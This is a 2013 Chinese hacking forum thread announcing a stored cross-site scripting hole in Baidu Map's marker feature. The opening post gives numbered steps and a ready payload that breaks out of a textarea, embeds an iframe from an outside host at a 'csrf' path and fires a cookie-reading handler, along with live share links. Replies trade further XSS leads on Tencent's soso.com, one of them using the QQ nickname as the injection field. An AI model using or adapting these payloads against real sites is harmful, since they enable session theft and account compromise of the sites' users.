天马行空工作室

 找回密码
 加入天马
搜索
查看: 4122|回复: 9

百度地图高危漏洞

[复制链接]
发表于 2013-6-16 22:47:52 | 显示全部楼层 |阅读模式
更搜狗异曲同工!!!

1.在工具栏里面点标记
b1.png
2.在文字栏输入代码
  1. </textarea><iframe src=//tmxk.org/csrf width=600 height=1000 onmouseover=alert(document.cookie)>
复制代码
b2.png

3.保存后点分享
b3.png

4.查看链接:
b4.png
b5.png

5.测试连接:
天安门,http://j.map.baidu.com/9538i
钓鱼岛,http://j.map.baidu.com/G838i


评分

参与人数 1给力 +1 酱油 +2 收起 理由
X5T + 1 + 2 老大有个建议,发漏洞的时候能否把测试代码.

查看全部评分

相关帖子

 楼主| 发表于 2013-6-16 23:13:05 | 显示全部楼层
发表于 2013-6-18 09:00:11 | 显示全部楼层
这几个真心不止10rank  ,不知道评分标准在哪里
发表于 2013-6-19 19:24:21 | 显示全部楼层
我看丫的得给 你妹的rank,你知不知道你这样,害的那些人又要增加工作。肯定在诅咒你。
发表于 2013-7-6 01:37:01 | 显示全部楼层
企鹅有只类似的xss
 楼主| 发表于 2013-7-6 15:44:30 | 显示全部楼层
发表于 2013-7-6 23:01:12 | 显示全部楼层
本帖最后由 X5T 于 2013-7-6 23:35 编辑
有点崩溃的感觉,图片上传不上了 提示不能上传零字节的。。。                                                                                              霜印老大厉害,哈哈嗖嗖的 查找有反射,收藏有存储型xss,目前自己弹自己,还没挖利用的地方,目测还有一处可以盲打管理传不上图
 楼主| 发表于 2013-7-7 00:08:22 | 显示全部楼层
X5T 发表于 2013-7-6 23:01
有点崩溃的感觉,图片上传不上了 提示不能上传零字节的。。。                                            ...

http://wap.soso.com/   has  self-xss
发表于 2013-7-7 02:54:35 | 显示全部楼层
random_ 发表于 2013-7-7 00:08
http://wap.soso.com/   has  self-xss

紫薇型。。或许偶然一天腾讯就让他可以用了,老大发出测试连接代码学习下
 楼主| 发表于 2013-7-7 09:32:28 | 显示全部楼层
X5T 发表于 2013-7-7 02:54
紫薇型。。或许偶然一天腾讯就让他可以用了,老大发出测试连接代码学习下
...

login this url http://pt.3g.qq.com/s?aid=nLogin and test soso.com
your qq nickname is the xss factor ,you could see the result in http://wap.soso.com,the maxstringlength is about 15 byte
您需要登录后才可以回帖 登录 | 加入天马

本版积分规则

Archiver|手机版|小黑屋|天马行空工作室 ( 京ICP备12003429号  

GMT+8, 2019-12-8 09:30 , Processed in 0.034717 second(s), 23 queries .

Powered by Discuz! v8

© 2010-2014 百度地图高危漏洞 - XSS 天马行空工作室

快速回复 返回顶部 返回列表